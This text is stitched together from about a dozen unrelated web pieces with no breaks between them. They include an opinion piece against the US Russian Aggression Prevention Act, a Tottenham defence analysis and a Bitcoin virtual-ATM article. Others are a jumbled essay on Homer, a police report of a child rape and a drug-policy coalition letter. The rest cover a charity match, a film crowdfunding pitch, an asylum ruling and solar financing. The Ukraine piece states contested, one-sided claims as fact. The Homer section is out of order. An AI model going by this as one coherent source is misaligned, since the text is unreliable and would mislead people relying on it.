In Russia, Putin now is under intense domestic political pressure to send Russian forces into Eastern Ukraine, in order to stop the attacks by the Ukrainian military on the cities there, which were once part of the Soviet Union.These attacks have created an absolute humanitarian catastrophe.
On August 5, 2014, the Office of the United Nations High Commissioner for Refugees reported that 740,000 Eastern Ukrainians had fled to Russia. They go there because Russia is close, and because most of the refugees are ethnic Russians, a fact that explains why the Russophobes in Kiev have been quite willing to indiscriminately bombard their cities.
What is taking place in Eastern Ukraine amounts to “ethnic cleansing,” the forced removal of ethnic Russians from Eastern Ukraine. This is a process that is fully supported by the US; RAPA would greatly enhance this support.
Ukrainian military forces have surrounded Donetsk – a city of almost one million people – and have for weeks conducted daily attacks against it using inaccurate multiple-launch rockets, heavy artillery fire, ballistic missiles carrying warheads with up to 1000 pounds of high explosive, and aerial bombardments. Water supplies, power plants, train stations, airports, bridges, highways, and schools have all been targeted, along with the general population. In Lugansk, a city of more than 440,000 people, a humanitarian crisis has been declared by its mayor, because the siege of the city has left it with little medicine, no fuel,intermittent power, and no water since August 3 (three weeks at the time of this writing).
After the separatists of Eastern Ukraine demanded autonomy from Kiev, and then reunion with Russia, the government in Kiev branded them as “terrorists”, and sent its military forces against them in what they euphemistically call an “anti-terrorist operation.” Framing the conflict this way makes it politically acceptable to refuse to negotiate with the separatists, and easier to justify in the US and Europe, which have grown accustomed to “the War on Terrorism.” However, the thousands of Ukrainians being killed and hundreds of thousands of being driven from their homes are just ordinary people, trying to live ordinary lives.
The New York Times reports the Ukrainian military strategy has been to bombard separatist-held cities and then send paramilitary forces to carry out “chaotic, violent assaults” against them. Many of the Ukrainian paramilitary forces were recruited from ultra-nationalist, neo-Nazi political parties; the Azov battalion flies the “Wolves Hook” flag of Hitler's SS divisions. Considering that more than 20 million Russians died fighting the Nazis during World War II, the presence of openly Nazi militias attacking ethnic Russians in Ukraine creates extreme anger in Russia.
RAPA supports plans in Kiev for an attack on Crimea
The Russian Aggression Prevention Act demands that Russia “withdraw from the eastern border of Ukraine,” which is by definition, the Russian border. In other words, RAPA provocatively demands that Russia remove its own military forces away from its own borders, while Ukrainian military forces are meanwhile massed on the other side, attacking predominantly Russian cities.
RAPA also demands that “Russian forces must have withdrawn from Crimea within seven days of the enactment of the Act.” Not likely to happen, given that
(1) Crimea was part of the Russian empire from 1783 until 1954,
(2) withdrawal from Crimea would require Russia to abandon its only warm water port at Sevastopol, where Russian forces have been based, by internationally recognized treaty, since 1997, and
(3) more than three-quarters of all Crimeans voted “yes” to reunify with Russia, a vote which Russia accepted by its subsequent annexation of Crimea.
Thus, in the eyes of Russia, the requirement to “withdraw from Crimea” amounts to a US demand that Russia surrender Russian territory. Putin has just taken the entire Russian Duma (the Russian House of Representatives) to Crimea, to address them there and strongly make the point that there will be no withdrawal from Crimea.
RAPA, however, stipulates that the US does not recognize the Russian annexation of Crimea, and creates sanctions and legal penalties for anyone who does. RAPA therefore provides both military and political support for Ukrainian President Poroshenko's stated goat that Ukraine will retake Crimea.
This goal was recently echoed by the Ukrainian defense minister, who was applauded by the Ukrainian Parliament when he told them that the Ukrainian army will “have a victory parade in Sevastopol“. These statements are taken seriously in Moscow, where they are viewed as a promise to attack Russia. Thus, Putin's advisers are telling him he must fight today in Eastern Ukraine, or tomorrow in Crimea.
Any Russian military intervention in Eastern Ukraine would certainly be described in the West as Russian aggression in pursuit of empire, which would trigger deafening demands that US/NATO forces act to support Ukraine. Should NATO intervene, subsequent Russian military action against any NATO member would trigger the alliance's Chapter 5 mutual defense clause, committing it to war with Russia.
Any major Ukrainian attack upon Crimea would make war with Russia inevitable. Ukraine appears to be preparing for such an assault by drafting all men of ages 18 to 60 years, in a forced mobilization of its armed forces, which also includes calling up its active reserves of one million men, and bringing more than 1000 battle tanksout of storage. Putin is being told by his close advisers that Ukraine will have an army of half a million men in 2015.
RAPA would provide hundreds of millions of dollars to train and arm the rapidly expanding Ukrainian armed forces, and position US/NATO forces for rapid intervention on the side of Ukraine in the event of a Ukrainian-Russian war. Thus, the many political and military provisions of RAPA would certainly act to fully encourage Ukraine to carry out its stated policy to retake Crimea. The Republic of Georgia attacked Russian forces in 2008 with far fewer US promises of aid. Of course, RAPA would also arm Georgia, too.
RAPA moves the US towards nuclear war with Russia
A US/NATO-Russian war would instantly put US and Russian nuclear forces at peak alert, with both sides anticipating a nuclear first-strike from the other. Both the US and Russia have changed their nuclear war-fighting plans to include the use of preemptive nuclear first-strikes; both nations have “tactical” nuclear weapons designed for battlefield use.
The US has 180 B61 nuclear bombs deployed on six military bases of five other NATO states, which would be released to these NATO members in the event of a US/NATO-Russian war. Russia also has at least 1300 tactical nuclear weapons, and Russian war doctrine specifies their use against overwhelming conventional (NATO) forces. Any use of “tactical” or “battlefield” nuclear weapons, by either side, would likely trigger an equal or greater response from the other.
During the first Cold War, the US studiously avoided any direct military confrontation with Russia, because it was widely thought that such a war would inevitably escalate to become a nuclear war – which would utterly destroy both nations. However, there seems to be little thought or discussion of this in the US today, despite the fact that both the US and Russia appear to be preparing for such a war.
In May, the increasing tensions in Ukraine led both nations to almost simultaneously conduct large nuclear war games. Long-range Russian nuclear bombers tested US air defenses16 times in a ten day period (July 29 – August 7). US and Russian leaders are either unaware or choose to ignore the fact that such “games” and “tests” are a dress rehearsal for human extinction.
Peer-reviewed scientific studies predict the environmental consequences of a war fought with only a fraction of US and/or Russian strategic nuclear weapons would likely wipe out the human race. Scientists predict that even a “successful” US nuclear first-strike, which destroyed 100% of Russia's nuclear forces before they could be launched, would create catastrophic changes in global weather that would eliminate growing seasons for years. Most humans and large animals would starve to death.
Nuclear war is suicide for humans, but our leaders still have their fingers on the nuclear triggers. There seems to be absolutely no awareness, either in our Federal government or in the American public, of the existential danger posed by nuclear war. Such ignorance is embodied by The Russian Aggression Prevention Act, which if enacted will put us on a direct course for nuclear war with Russia.
Steven Starr, Senior Scientist, Physicians for Social Responsibility
Tottenham defenders Younes Kaboul and Michael Dawson have everything to prove if they are to convince Mauricio Pochettino they're the men for the job.
It's best not to read too much into preseason results, but they do give an insight into the current strengths and weaknesses of a team.
Manager Mauricio Pochettino's Tottenham side have looked good going forward so far this summer, attacking with much more pace and movement than last season. The midfield is now looking to move the ball forward quickly, and there has been a noticeable increase in the amount of one- and two-touch passing -- though this might just be a byproduct of Mousa Dembele and Paulinho not playing.
Further forward, the movement of the attacking midfield three bodes well for the future. The trio have license to roam, as evidenced by Erik Lamela's two goals against Toronto FC. Starting on the right, Lamela had freedom to drift toward the middle of the field and scored both of his goals from a position on the left.
Spurs have scored three goals in each of their preseason games, but the fact that they have conceded a total of five demonstrates where the problem lies. Against Seattle the team defended abysmally, with keeper Brad Friedel having to pull off a passable impression of Tim Howard against Belgium to keep the score line decent.
- WhoScored: Vorm's move to Spurs makes sense
Tottenham may be linked with players such as Morgan Schneiderlin and Antoine Griezmann, but it would be no disaster if they went into the new season without reinforcements in the midfield and attack.
The defence is a different matter, with more work needing to be done. The club have gone some way to addressing the issues at the back. Ben Davies was brought in to solve the long-running problem at left-back, and Michel Vorm was recruited to provide suitable cover for keeper Hugo Lloris.
Michael Dawson's performances have been woefully off pace, but things aren't as simple as merely replacing him with a younger model. Younes Kaboul also has to prove he can get back to his best because on last season's form, he too is past it. In contrast, Zeki Fryers probably needs more experience before he's ready for more action at Spurs and would benefit from a loan move.
As if that wasn't enough, it is rumoured that Vlad Chiriches could be joining Roma. Though his form declined as last season went on, Chiriches was impressive in his early months at the club. Surely he can't be allowed to leave while Dawson and Kaboul are still there?
You'd think not, but Steven Caulker was sold when it made more sense to offload someone else. Plenty of Tottenham fans don't rate him, yet it's undeniable that he would have seen plenty of first-team action last season. Caulker might never turn out to be a world-beater, but he was available at a relatively modest price this summer. He has potential and, at this stage of his career, is better than Dawson (and most probably Kaboul).
He's also arguably a better bet than Ron Vlaar. The Aston Villa defender had an incredible World Cup and Spurs are currently linked with a move for him. It's an odd link as Vlaar is far too slow to play in Pochettino's system.
Some better options have fallen by the wayside. Dejan Lovren was too expensive and Hector Moreno broke his leg during the World Cup. More candidates must be found fast, because the question is not whether Spurs need to sign a new central defender, but if one will be enough.
Netcoins: 'Bitcoin Brothers' Virtual ATM Network
Michael Vogel a Canadian from Vancouver wants to spread Bitcoin adoption by improving accessibility and removing barriers. The co-founder of the Netcoins application offers a software service that enables merchants to house a virtual Bitcoin ATM with only a smartphone.
Also read: EU Parliament Approves Bitcoin Regulatory Guidelines
A Bitcoin ATM, But Without the ‘M'
Netcoins is a software company out of Vancouver, Canada that initiated its virtual ATM business in 2015. Merchants from all over the world can sign up for the Netcoins service and be provided with a platform that allows them to have a Bitcoin ATM without having to buy a machine. The application can work on a smartphone or tablet allowing merchants to offer the sale of Bitcoin without the substantial costs involved with the purchase of a device or the physical space needed within the store.
In a recent interview, Michael Vogel said the Netcoins service will be working with countries such as the UK, U.S., Ireland, and Canada. Vogel explains that his business is doing well, which is helping them “scale rapidly” and he believes someday there will be “a lot of services that rely heavily on Bitcoin's global infrastructure.” Additionally, the service offers no costs to stores whatsoever and signing up for Netcoins is free to merchants worldwide. Netcoins states on its website:
Whether a customer orders $20 or $2,000 in Bitcoin Netcoins does all the heavy lifting. Stores don't need to maintain inventory or manage legal compliance: Netcoins handles everything and supplies all Bitcoin. In fact, there is no cost to stores. Merchants can earn additional revenue by selling Bitcoin.
The co-founder of Netcoins says that the project came about because he wanted to offer a better way for consumers to access Bitcoin in brick and mortar venues. Michael Vogel operates the executive and engineering aspect of the company while his brother Dominic Vogel runs the Internet Security and operations. The two co-founders are known as the “Bitcoin Brothers” and are big believers in this industry. Dominic Vogel worked within the banking industry with a background in cyber-security.
The Netcoins virtual ATM charges a convenience fee that gets split between the clerk and the service provider. Most of its clientele currently reside in the Canadian region at the moment, and those who wish to visit a virtual kiosk can use the company's location services. By creating a software-based Bitcoin ATM the company believes it eliminates the need for clunky floorspace models and the knowledge to maintenance machines. With its service, the company says technical expertise is not required to run a virtual ATM.
Now, any merchant can “attract new customers and increase revenue by turning any device into a Bitcoin ATM,” says Netcoins.
What do you think about Netcoins Virtual ATM concept? Let us know in the comments below.
Images courtesy of Netcoins blog & website
No one knows exactly when the Greek poet Homer lived. Herodotus , the father of history, guessed around 850 BC. Other ancient sources proposed that he was conjuring up transcendent imagery as early as the 12th century BC. Modern researchers, however, appear to place Homer in the 7th or 8th centuries BC.
The dates, as you can see, vary wildly. All we do know is that his compositions are considered the oldest works of western literature and have had an enormous and incalculable influence throughout the history of the written word.
At the same time, the stylistic similarities between the two mammoth stories are overwhelming, suggesting that, yes, it was the result of single author. But to throw another wrench into the mix, most scholars agree that the books underwent a process of standardisation and refinement in the beginning of the 8th century BC. Any wonder then that the styles were so similar…
We also can't be certain that Homer was even a man, presuming he or she once lived. Samuel Butler , an important 19th century translator, argued that based on literary observations, it was a young Sicilian woman who wrote The Odyssey… but interestingly enough, not The Iliad.
So what do we know about Homer? How are we to learn anything about this ancient poet, if he or she did indeed walk this earth? Where do the clues lie to this ancient puzzle?
The answer may be obvious: We have to look at the poetry itself and piece together what we can. Unfortunately most of us do not have the time, nor the ancient greek skills to delve into the mystery ourselves…
For this reason, Classical Wisdom Weekly spoke with Ancient Greek expert A.P. David for insights into who Homer was and how we can better understand the monumental works of The Iliad and The Odyssey. A scholar and a gentleman, A.P. David also presents some alternative views on the subject… ones that might make you question everything you thought you knew about the epic poet and his (or her) writings.
But the “ Homeric Question ” goes deeper than just dates… Historians aren't even sure he existed at all. His works may be the culmination of generations of storytelling, all grouped under a fictitious name and nothing else. Could one man have written both The Iliad and The Odyssey?
Officers were called to the Integris Southwest Medical Center, Saturday afternoon, in regards to a child molestation report. When police arrived they met with the child's legal guardian, who said she had to work that day. So she told her husband, 24-year-old Andres Caal, to drop the child off at her sister's house.
It is not clear what time Caal actually dropped off the child, but at 11:30 a.m. but the sister told police she had just waked up and planned to take the young girl out for lunch when she noticed something on the butt area of the girl's pink sweat pants. When she tried to wipe it off she noticed it was blood.
The young girl, according to the sister did not want to be touched because she said that her butt hurt. When the two went to the bathroom, the sister said she saw that the girl was bleeding from her groin area. The sister called the guardian back to the home and told her that the young girl was hurt. From there they went to Integris to see a doctor.
After examining the girl, the doctor informed DHS and the police that the girl had a significant injury to her vaginal area that would need to be surgically repaired. The doctor told police, “I can say the victim's injury was from sexual abuse based off my physical examination.”
After investigating further, police eventually located Caal, who was hiding out at his grandmother's home. He was taken into custody without incident on one count of First-Degree Rape of a Child Under 16-Year-Old. He also had an outstanding city warrant for speeding. His bond was set at $50,000.
Coalition to President Obama: "It is time for a new approach on marijuana policy."
Contact: Allen St. Pierre, NORML Executive Director, (202) 483-5500
Paul Armentano, NORML Deputy Director, paul@norml.org
Washington, DC -- In the wake of recent attacks on medical marijuana providers and patients by multiple branches of the federal government, including Monday's raids on Oaksterdam University in Oakland, CA, a coalition of six national drug policy reform organizations is appealing to President Obama and his administration to follow its own previously stated policies respecting state medical marijuana laws. In the letter, posted in full below, the organizations call on the Obama administration to bring an end to the federal government's ongoing campaign to undermine state efforts to regulate safe and legal access to medical marijuana for those patients who rely on it.
The Obama Administration's National Drug Control Strategy Report 2012, reportedly being released in the coming days, is expected to cling to failed and outdated marijuana policies which further cement the control of the marijuana trade in the hands of drug cartels and illegal operators, endangering both patients in medical marijuana states and citizens everywhere. The members of this coalition stand together with members of the Global Commission on Drug Policy, current and former Latin American leaders whose countries are being ravaged by drug cartels, state officials from five medical marijuana states, and tens of millions of Americans in their call for a more rational approach to marijuana policy.
###
THE LETTER TO PRESIDENT OBAMA:
April 4, 2012
President Barack Obama
The White House
Washington D.C. 20500
Via Fax: 202-456-2461
Dear Mr. President:
Our coalition represents the views of tens of millions of Americans who believe the war on medical marijuana patients and providers you are fighting is misguided and counterproductive. As your administration prepares to release its annual National Drug Control Strategy, we want to speak with one voice and convey our deep sense of anger and disappointment in your lack of leadership on this issue.
Voters and elected officials in sixteen states and the District of Columbia have determined that the medical use of marijuana should be legal. In many of these states, the laws also include means for providing medical marijuana patients safe access to this medicine. These laws allowing for the cultivation and distribution of medical marijuana actually shift control of marijuana sales from the criminal underground to state-licensed, taxed, and regulated producers and distributors.
Instead of celebrating - or even tolerating - this state experimentation, which has benefited patients and taken profits away from drug cartels, you have turned your back as career law enforcement officials have run roughshod over some of the most professional and well-regulated medical marijuana providers. We simply cannot understand why you have reneged on your administration's earlier policy of respecting state medical marijuana laws.
Our frustration and confusion over your administration's uncalled-for attacks on state-authorized medical marijuana providers was best summed up by John McCowen, the chair of the Mendocino County (CA) board of supervisors, who said, "It's almost as if there was a conscious effort to drive [medical marijuana cultivation and distribution] back underground. My opinion is that's going to further endanger public safety and the environment - the federal government doesn't seem to care about that."
The National Drug Control Strategy you are about to release will no doubt call for a continuation of policies that have as a primary goal the ongoing and permanent control of the marijuana trade by drug cartels and organized crime. We cannot and do not endorse the continued embrace of this utterly failed policy. We stand instead with Latin American leaders, members of the Global Commission on Drug Policy, and the vast majority of people who voted you into office in recognizing that it is time for a new approach on marijuana policy.
With approximately 50,000 people dead in Mexico over the past five years as the result of drug war-related violence, we hope that you will immediately reconsider your drug control strategy and will work with, not against, states and organizations that are attempting to shift control of marijuana cultivation and sales, at least as it applies to medical marijuana, to a controlled and regulated market.
Sincerely,
Drug Policy Alliance (DPA)
Law Enforcement Against Prohibition (LEAP)
Marijuana Policy Project (MPP)
National Cannabis Industry Association (NCIA)
National Organization for the Reform of Marijuana Laws (NORML)
Students for Sensible Drug Policy (SSDP)
cc: Eric Holder, Attorney General, Department of Justice
James Cole, Deputy Attorney General, Department of Justice
Gil Kerlikowske, Director of the Office of National Drug Control Policy
TUKWILA, Wash. -- Just moments after the end of this year's iteration of his “Zakuani & Friends Charity Match” at Starfire Sports on Sunday, former Sounders star Steve Zakuani already found himself the recipient of some good news.
“I've already been told we've more than doubled what we [raised] last year,” Zakuani said. “So that's double the kids, double the programs, it's going to stretch that money a long way. I think I can hope a lot more kids this coming year. So I'm happy.
“We'll put at least two more kids through university and at least 10 through a soccer scholarship.”
This year marked the second in a row that Zakuani has hosted the charity match, which raises funds for his Kingdom Hope foundation. The teams – divided into red and blue jerseys – featured a star-studded cast of characters, ranging from retired MLS and American soccer legend Landon Donovan, to Seattle Seahawks kicker Steven Hauschka.
A healthy list of former Sounders also joined in, including Marcus Hahnemann, Eddie Johnson, Patrick Ianni, Roger Levesque and Nate Jaqua. Johnson and Donovan were the stars of the show, with each notching a hat trick on the evening, while Zakuani himself got in on the action with a first-half goal of his own, the first of the match.
17' - GOOOOOOOOOAL! Who else to open the #ZakAndFriends scoring but @Zakuani11?!?! — Seattle Sounders FC (@SoundersFC) May 15, 2016
Ultimately, Donovan and Zakuani's blue jersey squad would prevail by a slim 7-6 margin.
“It was a lot of fun,” Donovan said afterwards. “A lot of people came out and paid their hard-earned money to help something very special. I think we enjoyed, the guys enjoyed it. It was good to get out here and play.
“Everybody you talk to [about Zakuani] tells you what a great guy he is. And so if he's supporting something you know that it's real and it's meaningful.”
Oguchi Onyweu – a teammate of Donovan's during his time as a US national team mainstay -- was another notable participant.
“I was honored that [Zakuani] reached out to me to be a part of this,” Onyweu said. “This is definitely for a great cause and you can see the passion that he has when he speaks about it. I was just privileged to be a part of it and be here and be amongst all these former players that I used to play against.”
THANK YOU to everyone who joined us today for the #ZakAndFriends Charity Match! pic.twitter.com/ctmYKvIiVp — Seattle Sounders FC (@SoundersFC) May 16, 2016
Even coming off last year's successful inaugural version of the event, Zakuani said the turnout this year was especially impressive from his perspective, given some morning rain showers that he thought might hurt the turnout.
“This community keeps amazing me day-by-day by how they come out,” Zakuani said. “They turned out, it was great, they were cheering, the music was going. Just a very cool event.
“I thought we'd get a lot. But when I looked up, every seat was almost filled. We had a VIP postgame meet-and-greet with 200 people. You can't beat that. I've got to go back and think about how we're going to top this next year.”
What is Better The Devil?
Better The Devil is a short form horror/black comedy film written by Alessandro Pulisci for the San Francisco State University Cinema Department's thesis film class and starring Tim deZarn (Cabin in the Woods, Fight Club, Spider-Man, Star Trek, Sons of Anarchy), to be shot in December 2013 and edited during the Spring 2014 semester.
The film is about a group of people who learn the hard way that you can't judge a book by its cover, and sometimes the devil you know is better than the one you don't.
Alright, but why would I want to watch it?
The film is a loving riff on the horror genre, in the vein of the original Evil Dead films, Scream, or more recently, Cabin in the Woods. All the blood and guts for you gorehounds, plus clever dialogue and playful pokes at well worn genre norms that fans of Sam Raimi and Edgar Wright will appreciate.
Fair enough. Who's in this picture?
Tim De Zarn as Lou
Taylor Michele as Amy
Nathan Brown as Chris
Ian C Hopps as Judah
Katrina Sherwood as Jessica
Colby Landry as Bonnie
(special thanks to James Hiser for standing in as Lou in the teaser)
And who's this Pulisci guy, anyway?
Alessandro Pulisci is a senior at SFSU, planning to graduate in the Spring. Born and raised in the Peninsula, some of Pulisci's earliest memories are making movies with his father around the house and backyard, and going to the movies together after school every week. He took an interest in music and spent his high school years playing in bands in the Bay Area punk scene before returning to college and his love of Cinema. His production banner, Ugly Owl Films has had a busy year as Alessandro builds his portfolio (including an entry in the ABCs of Death 2 competition) and 2014 is shaping up to be even bigger.
What of the crew?
Director of Photography: Favienne Howsepian
Assistant Director: Alex Gilbert
2nd Assistant Director: Ariel Sinelnikoff
Producers: Ariana Minolli and Erica Simons
Gaffer: Eric Paulsen
Sound Recordist: Sterling Cook
Art Director: Sarah Mahan
Special Effects Artist: Alyssa Harrison
1st Assistant Camera: Theresa Wong
2nd Assistant Camera: Sydney Cox
Script Supervisor: Daniela Festa
Production Assistants: Sal Jimenez, Kristin Wingfield
Well, what are you doing with my money?
The answer better not involve a Scrooge McDuck-esque swimming pool.
No cash diving for us! Although that would make for an interesting reward... No, all the funds raised here will go towards making the absolute best possible film. This means shooting at a beautiful location with high quality equipment and talented actors. We are planning on using the Blackmagic Cinema Camera, which is relatively inexpensive but captures gorgeous images. If we exceed our goal, the first order of business will be to upgrade to a RED Camera, responsible for films such as The Girl With The Dragon Tattoo, This is the End, Thor: The Dark World, The Great Gatsby, and many more. Beyond that, we will be able to pay our extremely talented and generous crew, who is working for free, and submit the film to festivals around the world.
We even created this lovely pie chart for you to get an idea of where the money will be going:
And what do I get for donating?
We have some awesome rewards lined up for our backers. Here are a few of the best deals:
$25 - you get public recognition for being awesome, a sticker pack, a special thanks in the credits, AND a digital copy of the film as soon as it's completed!
$35 - in addition to everything above, you get a DVD or Blu Ray of the film which will include outtakes and behind the scenes footage, and an 11x17 promo poster!
$100 - Everything above, plus the option of an 11x17 promo poster or a script, signed by the director and cast!
$150 - we're offering a limited edition art print from the notorious and insanely talented street artist Give Up. We'll only be making 40 of these in this colorway, so once they're gone, they are gone. Plus you get the shout outs, stickers, special thanks, and a copy of the film in the format of your choosing!
$170 - one of a kind, handmade sign from Moon Editions, made for and used in the film!
$200 - Evil Dead trilogy marathon on the big screen with the cast and crew and 5 of your friends! Going to be an AWESOME day.
Be sure to check out all the other awesome rewards, conveniently located just to the right here!
Okay, you got me. What do I do now?
First, make a donation of any size. Even a dollar helps. You can also change your donation amount anytime before the campaign ends and you will not be charged a penny unless we meet our fundraising goal.
After you've done that, Kickstarter will give you the option to send a message out to your friends/followers on Twitter and Facebook and the like. The message will say you just backed us and it will include a link to our project page (you can edit the text). Please send these messages! It only takes a second and will help us tremendously!
Next, convince a friend or your grandmother or your cat to make a donation as well. Everything helps.
Finally, pat yourself on the back! Take solace in the knowledge that you're super awesome and you're helping us realize our vision.
Thank you so much for your support! We cannot wait to show you all the completed film!
Don't forget to follow us on Facebook, Twitter, and Instagram for updates about the film, behind the scenes photos and info, and to see your shout outs!
An unmarried Albanian woman who feared she would be kidnapped and forced into prostitution if deported to her home country is eligible for asylum in the US, a federal appeals court ruled on Friday.
The decision, which does not mean the woman will necessarily be granted asylum, is important nevertheless because it embraces an expansive reading of the potential grounds that asylum applicants may claim to receive the protection of the US government.
It is also important because it is in direct opposition to two other federal appeals courts that rejected similar claims for asylum by young Albanian women.
That split within the appeals courts could set the stage for review at the US Supreme Court.
The central issue in the case was whether the Albanian woman, Johanna Cece, could credibly claim to be a member of a persecuted “social group” that would make her eligible for asylum.
In Ms. Cece's case, the appeals court identified the protected group as young women living alone in Albania who are targeted for prostitution by sex traffickers.
Cece told US officials that in 2001 her parents left Albania and that she was forced to live alone. It is unusual for unmarried women to live alone in Albania outside a protective family group, according to the court record.
Cece said she soon attracted the attention of one of the leaders of a criminal gang known to kidnap Albanian women and force them into prostitution. She said that after being threatened several times, she moved to another city and eventually made her way to Italy. There she obtained a false Italian passport, traveled to the US, and applied for asylum.
The decision by the full Seventh US Circuit Court of Appeals in Chicago reverses an earlier ruling by the Board of Immigration Appeals. The BIA had rejected Cece's asylum request, saying she was not a member of a recognized social group eligible for protection.
The BIA also said she could reduce her risk of falling prey to sex traffickers by moving to a different part of Albania.
To be eligible for asylum in the US, an applicant must show he or she has a well-founded fear of persecution in his or her home country on account of race, religion, nationality, membership in a particular social group, or political opinion.
Cece's claim was based on her membership in a social group comprised of young Albanian women at risk of being forced into prostitution.
Writing for the majority, Judge Ilana Rovner said the broad social group category endorsed by the Seventh Circuit was not unlike other groups of women that have been granted asylum in the US, such as women in tribes that practice female genital mutilation, Jordanian women who face “honor killings” because of social and religious norms in that country, and Christian women in Iran who are forced to adhere to the Islamic female dress code.
In a dissent, Chief Judge Frank Easterbrook said the appeals court's decision expands asylum law to embrace “everyone threatened by criminals, rebels, or anyone else a nation's government does not control.”
“This makes eligible for asylum everyone who faces a substantial risk of harm in his native land, no matter the reason,” Chief Judge Easterbrook wrote.
Easterbrook said US asylum laws are designed to protect individuals from persecution by other governments – not mere criminals.
“Crime may be rampant in Albania, but it is common in the United States too. People are forced into prostitution in Chicago,” he said.
“Must Canada grant asylum to young women who fear prostitution in the United States, or who dread the risk of violence in or near public-housing projects? If there were reason to think the Albanian government in cahoots with the traffickers, Cece would have a better case; but when the record shows no more than ineffective law enforcement, there's no basis to infer persecution,” Easterbrook said.
Judge Rovner defended the majority decision against criticisms in two dissents.
“Those who fear that the slope leading to asylum has been made too slick by broad categories need not worry,” she wrote.
She said that while the category may include many people, only a few with legitimate claims would be able to make the necessary linkage to prove that the persecution was being carried out because of membership in the designated group.
“In order to be entitled to asylum, Cece must be able to demonstrate a particular link between her mistreatment and her membership in the stated social group,” Rovner said.
The Seventh Circuit decision sends the case back to the lower courts to consider whether to grant Cece asylum.
Get the Monitor Stories you care about delivered to your inbox. By signing up, you agree to our Privacy Policy
“Although the court decides today that Cece is eligible for asylum, it does not hold that she is entitled to it; that question, at least, remains open to decision on remand,” Easterbrook said.
The case is Johanna Cece v. Eric Holder (11-1989).
Ten years ago many Americans couldn't afford to buy a solar electric system for their home. Today, many consumers still can't stomach the steep sticker price, even if it offers the promise of low-cost, clean renewable energy in the long term. But thanks in large part to third-party financing that frequently includes no-money-down options for residential PV systems, that's changing.
In 2003 there were only 5,000 residential PV customers in the United States. Last year alone, there were roughly 83,000 residential PV installations. Since 2010, more than 1,100 megawatts of residential PV have been installed across the country.
A similar solar revolution is happening in the developing world. While the scale of the challenge is vastly different, the nature is the same: overcoming the high upfront cost of solar to access its long-term promise of low-cost, low-carbon energy.
Surmounting the upfront cost barrier
The majority of growth in residential PV systems in the U.S. over the past several years has been in households with median incomes of $40,000 to $90,000. The upfront cost of installing an average 6 kW system would run $21,200 at the 2012 price of $5.30/W and including the federal tax credit. This is approximately 25 to 50 percent of PV customers' median income.
Similarly, a 40-watt solar home system for a rural family in the developing world, which is typically enough to cover the majority of a family's needs such as lighting, cell phone charging, and radio or television, may cost around $350. For the 1.2 billion people earning less than $1/day, that is nearly 50 percent of a family's income, assuming a two wage earner family. Needless to say, it's obvious why many homeowners, in both situations, do not have the capital to buy a system outright.
Pre-pay-as-you-go solar
Third-party financing models such as those offered by SolarCity and Sungevity allow homeowners in the U.S. to lease systems with no or very low money upfront. The homeowner is basically paying monthly for the energy they generate and consume, often at lower rates than they would be paying their utility company. The same thing can be said of the innovative financing programs taking off in off-grid areas of the developing world (1.5 billion people have no access to grid electricity). People pre-pay for the energy their system generates and they consume, often paying less than they did previously for kerosene, batteries, and candles.
Many of these models in lesser-developed countries rely on cell phone technology. While only 75 percent of people in the developing world have access to electricity, 89 percent have mobile phones. Ironically, those cell phone users not connected to the grid need to charge their phones somehow, and solar energy is often the best option.
In India, Simpa Networks has implemented a pricing model it calls Progressive Purchase, in which customers make a small initial down payment for a PV system and then pre-pay for the electricity it generates by purchasing energy credits using a mobile phone or a local agent. Once paid, the company remotely “unlocks” the customers' equipment until they use what they've paid for. Once the paid-for energy is consumed, the system locks until the customer purchases more energy. Each payment for energy also adds towards the final purchase price. Once fully paid, the system unlocks permanently and produces energy, free and clear.
A similar program by Angaza Design, operating in Tanzania, Kenya, and Zambia, is making transferring money to pay for solar energy simple as well. Less than 50 percent of people in the developing world have bank accounts. The lack of banking services makes transferring money from one remote location to another challenging. Thus the rise of mobile banking, allowing the transfer of money through mobile phones. Angaza's PAYG software platform takes advantage of mobile banking and allows people to make pre-payments for the combination solar-powered lanterns/cell phone chargers they provide using only a mobile phone with a voice plan, requiring no Internet access. The user makes a payment to Angaza Design using a mobile money platform. He or she then places the phone on the solar lantern and the devices exchange data encoded in audio tones. Thus the system is unlocked and their payment from one of many mobile money providers is received.
Azuri Technologies' Indigo system uses an approach that might be even more familiar to rural customers. The user buys pay-as-you-go scratch cards, which people use around the world to add minutes to their mobile phones. The user enters the passcode from the card into the Indigo unit allowing the system to operate for a period of time. The smallest system starts at three watts, and a single payment is enough energy to charge a mobile phone and light two rooms for eight hours a day for one week. Similar to Simpa Networks, some of the scratch card fee goes to paying off the system. Once the system is paid off, the customer can upgrade to a larger system, eventually purchasing the largest 80-watt system, which can run four lights and multiple appliances. The Indigo system is currently empowering people in ten countries throughout Africa, including Kenya, Rwanda, Ethiopia, and Uganda.
Disproportionate energy bills
These financing solutions are bringing great change and possibility to people around the world, just as third-party financing is doing in the U.S. There are however a couple of significant differences. While in the U.S. putting PV on your roof makes an environmental statement, saves money, and lowers your carbon footprint, in the developing world it means dramatically raising your standard of living when there is no or very limited grid access.
There is also a big difference in the disproportionate amount of money saved. In the average U.S. home less than three percent of income is spent on residential energy bills. However, in rural areas of the developing world, families often spend 30 percent or more of their income on kerosene for lighting. While a homeowner in the U.S. may pay between 10 and 15 cents per kilowatt-hour for electricity, a person in rural Kenya or Rwanda will pay a cost of 800 cents (~50 to 80 times more) per kilowatt-hour for kerosene lighting. And mobile phone charging is even worse, with a rural villager in Kenya paying nearly 400 times more to charge their phone—at a charging shop running off car batteries and/or diesel generators—than in the U.S.
Get the Monitor Stories you care about delivered to your inbox. By signing up, you agree to our Privacy Policy
For the 1.4 billion people in the world without electricity, solar energy is often the cheapest option. “There are all these debates about when solar will reach grid parity in the United States and elsewhere,” Angaza's Chief Technology Officer Bryan Silverthorn told Scientific American. “Africa is a place where, for a huge swath of the population, solar energy is now the cheapest option. No one knows what will happen next.”
As we watch the evolution of the solar industry in the U.S. and Europe, the market in the developing world likewise has great potential for growth. As industrialized nations struggle with how to lower their carbon footprints, the world must also address how the 1.4 billion people without electricity in the world are going to connect. With innovative financing models that remove the upfront cost barrier, it can be through clean renewable energy.
On Thursday, November 2, 2017, at the annual Agudath Israel Legislative Breakfast, key local elected officials will confer with Jewish community advocates on issues facing the New York Jewish community.
